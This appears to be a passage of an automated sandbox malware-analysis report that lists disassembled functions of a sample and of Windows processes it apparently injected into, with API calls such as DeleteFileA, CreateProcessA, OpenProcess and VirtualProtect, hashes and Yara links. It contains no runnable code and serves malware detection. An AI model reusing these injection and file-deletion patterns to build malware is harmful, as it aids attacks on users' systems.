                                                                                                                                                                                          control_flow_graph 824 1c29dd-1c2a1a call 1c3653 lstrcat call 1c2501 call 1c2a14 call 1c3653 lstrcat 834 1c2a20-1c2a43 call 1c2b4d call 1c34f7 824->834 838 1c2a48-1c2a4f 834->838 838->834 839 1c2a51-1c2a6d call 1c343f call 1c2683 838->839 844 1c2a6f 839->844 845 1c2a9a-1c2ab1 call 1c2683 839->845 844->845 847 1c2a71-1c2a86 call 1c26f9 844->847 850 1c2ade-1c2af5 call 1c2683 845->850 851 1c2ab3 845->851 847->845 855 1c2a88 847->855 860 1c2af8-1c2b11 call 1c2e97 850->860 861 1c2af7 850->861 851->850 853 1c2ab5-1c2aca call 1c26f9 851->853 853->850 862 1c2acc 853->862 855->845 856 1c2a8a-1c2a94 DeleteFileA 855->856 856->845 866 1c2b34-1c2b48 Sleep 860->866 867 1c2b13-1c2b1c call 1c3057 860->867 861->860 862->850 865 1c2ace-1c2ad8 DeleteFileA 862->865 865->850 866->838 867->866 870 1c2b1e-1c2b2e DeleteFileA 867->870 870->866
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                                            • Part of subcall function 001C2A14: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                                            • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                                            • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                                            • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                                            • Part of subcall function 001C2A14: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4261675396-0
                                                                                                                                                                                          • Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                                          • Instruction ID: d6b160bcfa924dc1f1ce780805323c99afb8a852cbc58ab7edcbb3794eecdb08
                                                                                                                                                                                          • Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D4130B15002289FDB22BB618D49FAF76BCEF60705F0444AEEA45E7041DB74DA80CEA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 023A2A01 Relevance: 9.1, APIs: 6, Instructions: 112stringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 871 23a2a01-23a2a3e call 23a3677 lstrcat call 23a2525 call 23a2a38 call 23a3677 lstrcat 881 23a2a44-23a2a67 call 23a2b71 call 23a351b 871->881 885 23a2a6c-23a2a73 881->885 885->881 886 23a2a75-23a2a91 call 23a3463 call 23a26a7 885->886 891 23a2abe-23a2ad5 call 23a26a7 886->891 892 23a2a93 886->892 898 23a2b02-23a2b19 call 23a26a7 891->898 899 23a2ad7 891->899 892->891 893 23a2a95-23a2aaa call 23a271d 892->893 893->891 901 23a2aac 893->901 906 23a2b1b 898->906 907 23a2b1c-23a2b35 call 23a2ebb 898->907 899->898 902 23a2ad9-23a2aee call 23a271d 899->902 901->891 904 23a2aae-23a2ab8 DeleteFileA 901->904 902->898 910 23a2af0 902->910 904->891 906->907 913 23a2b58-23a2b6c Sleep 907->913 914 23a2b37-23a2b40 call 23a307b 907->914 910->898 912 23a2af2-23a2afc DeleteFileA 910->912 912->898 913->885 914->913 917 23a2b42-23a2b52 DeleteFileA 914->917 917->913
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,023A29F8), ref: 023A2A07
                                                                                                                                                                                            • Part of subcall function 023A2A38: lstrcat.KERNEL32(00000000,023A2A2F), ref: 023A2A3E
                                                                                                                                                                                            • Part of subcall function 023A2A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 023A2AB8
                                                                                                                                                                                            • Part of subcall function 023A2A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 023A2AFC
                                                                                                                                                                                            • Part of subcall function 023A2A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 023A2B52
                                                                                                                                                                                            • Part of subcall function 023A2A38: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 023A2B66
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1892758259.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_23a0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4261675396-0
                                                                                                                                                                                          • Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                                          • Instruction ID: 9da0757af045d95e6db52a3ce6e47ad5f0962d2fb4c7b36bce32b4d4c4670bcd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                                          • Instruction Fuzzy Hash: 164131715052589EDB32AF708D58FAF77BDEF40709F4044B5AE86EA051EE349A80CEA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C2A14 Relevance: 7.6, APIs: 5, Instructions: 94filesleepstringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                                            • Part of subcall function 001C2B4D: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 001C2C44
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFile$Sleep$lstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 531250245-0
                                                                                                                                                                                          • Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                                          • Instruction ID: 49968fa7a4b5d5aca4da9ad6627b8677a1410d3c3c0f57381d6fd9009df4eb89
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                                          • Instruction Fuzzy Hash: B9313EB15002699FDB227B618C48FAF76FCEF60705F0044AEEA45E7045DB34DA80CEA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 023A2A38 Relevance: 7.6, APIs: 5, Instructions: 94filesleepstringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,023A2A2F), ref: 023A2A3E
                                                                                                                                                                                            • Part of subcall function 023A2B71: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 023A2C68
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 023A2AB8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 023A2AFC
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 023A2B52
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 023A2B66
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1892758259.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_23a0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFile$Sleep$lstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 531250245-0
                                                                                                                                                                                          • Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                                          • Instruction ID: 233f7c16acb58b24ad0c289a329ead04ef36ec8371ac91175a2a15474c24faff
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                                          • Instruction Fuzzy Hash: 71312F715052589EDB226F308D58FAF76BDEF40709F4044B5AE86EA054EF349A80CEA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C31C6 Relevance: 7.6, APIs: 5, Instructions: 62processstringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 001C31EA
                                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 001C3228
                                                                                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001C31B5,00000011,?,00000000,00000000), ref: 001C3255
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C3261
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C326D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3387338972-0
                                                                                                                                                                                          • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                                          • Instruction ID: 1a8fcc1b29af6dc6d508c4043910ddb7290efc2c1b1de9f1c1491fbd14d99cd8
                                                                                                                                                                                          • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                                          • Instruction Fuzzy Hash: 871121B2504958AFDF12AF60CC45FAF77BCEF60305F0145A9E986EA005DB349A90CEA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 023A31EA Relevance: 7.6, APIs: 5, Instructions: 62processstringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 023A320E
                                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 023A324C
                                                                                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,023A31D9,00000011,?,00000000,00000000), ref: 023A3279
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,023A31D9,00000011,?,00000000,00000000,00000000,023A3092,00000004,00000000), ref: 023A3285
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,023A31D9,00000011,?,00000000,00000000,00000000,023A3092,00000004,00000000), ref: 023A3291
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1892758259.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_23a0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3387338972-0
                                                                                                                                                                                          • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                                          • Instruction ID: 3b5c067545e4d537ebcb4c57ca1ccf2902eb49ee1031da120822be50baffde4f
                                                                                                                                                                                          • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B1121724005189FDF12AB60CC98AAFB7FDEF40305F0145A9E986EB015DA309A90CEA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C0B65 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindWindowA.USER32(001C0B57,0000000E), ref: 001C0B6A
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 001C0B77
                                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000), ref: 001C0B84
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 001C0BA6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$Window$ExitFindOpenThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 273847653-0
                                                                                                                                                                                          • Opcode ID: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                                          • Instruction ID: a9338b71442d5d3ebf48e46985c07ff31f3dafee2d3b1c7779650113a65b08a8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                                          • Instruction Fuzzy Hash: CE11EF25204301AEEF136BB08D56F663F28AF36B00F0A419DF8449E0A3DB20C9429A38
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 023A3F31 Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,023A3F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 023A3F51
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,00000000,?,023A3F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 023A3F6F
                                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 023A3F7F
                                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 023A3F8F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1892758259.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_23a0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep$HandleModule
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3646095425-0
                                                                                                                                                                                          • Opcode ID: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                                          • Instruction ID: 24c299aca025a81fc44dc181c23e8d7712eca15c556d989953a75213f2cff8fb
                                                                                                                                                                                          • Opcode Fuzzy Hash: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                                          • Instruction Fuzzy Hash: E8F01C705643509BFB603BB08C6D64A3AB9EF00704F0400F1AA89AE4A6CF7490508E75
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C3EC3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(001C3EBD,00000006,E8FFFE1B,00000000), ref: 001C3EC8
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleLibraryLoadModule
                                                                                                                                                                                          • String ID: j
                                                                                                                                                                                          • API String ID: 4133054770-2747090070
                                                                                                                                                                                          • Opcode ID: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
                                                                                                                                                                                          • Instruction ID: c4430a2c0c24a2b0bdc06aa21888522cca28319f24652424d60ea3f5ea681fdb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
                                                                                                                                                                                          • Instruction Fuzzy Hash: BEF0C871948250AEEB127A708855FAE32BCAF70701F00C45DBA95DA041DF30C740DAB7
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00580811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000013.00000002.2885118334.0000000000580000.00000040.00000001.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_580000_TextInputHost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: ad2bcb2392a4eecc8ec5ac587f61150cc7b45fc580965541663a43ffb8525291
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8131C3720006056FEF417B709D4AABA7FACFF51310F001165BD85EA0E2EA7449A98BB6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 003D0811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000014.00000002.2886762840.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_3d0000_RuntimeBroker.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 37606bd29bffd8747609349bc4e3a59d52761269dbb140b3fc6ccf4b2a91a728
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: DF31D4734102047FEB077B70AD46BBA3BACEF11700F000167BD95DE2A6EA7449649AB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00900811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000017.00000002.2810281551.0000000000900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_900000_RuntimeBroker.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 807355393fe14c1897a20badd90106663a8bf34a3f2784256eb9570d4bf43842
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A31E472000204AFEB017B709D86BBA3BACFF91300F444166FD85DA0E2EA7549A48AB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00181D5A Relevance: 4.6, APIs: 3, Instructions: 123memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2886724253.0000000000180000.00000040.00000001.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_180000_ApplicationFrameHost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                                          • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                                          • Instruction ID: f7edfa1d29ee3a2f15c71f23f1afa3dacc25a52c64f2328ccefa2793ada852ba
                                                                                                                                                                                          • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1121E531A34C1D0BEB58B27C9859764F6D6E79C320F980295E90DD36E4ED58CC8287C6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00180811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2886724253.0000000000180000.00000040.00000001.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_180000_ApplicationFrameHost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 5f0a2bf08c062a83ee58e576ca9a39c726153a08bf7c3d9358f7d983c0235e19
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7331B6724102087FEB427F709D46ABA376CEF26310F440165BD85DA0A6EB744BA9CFB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00190811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000001A.00000002.2886442210.0000000000190000.00000040.00000001.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_26_2_190000_RuntimeBroker.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 623531ca5508d48381e8169b3b0e04df07f96b68e4b13c9decdab74f5fa118bc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: F131F772510205BFEF027F709D46ABA3BACEF25300F400565BD85DA0A2EB744DA4CBB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00011D5A Relevance: 4.6, APIs: 3, Instructions: 123memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000001C.00000002.2888229544.0000000000010000.00000040.00000001.00020000.00000000.sdmp, Offset: 00010000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_10000_UserOOBEBroker.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                                          • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                                          • Instruction ID: 9f39b5367da6598aeeb1998e776373a994835cae58933e0181d4283a84448e61
                                                                                                                                                                                          • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
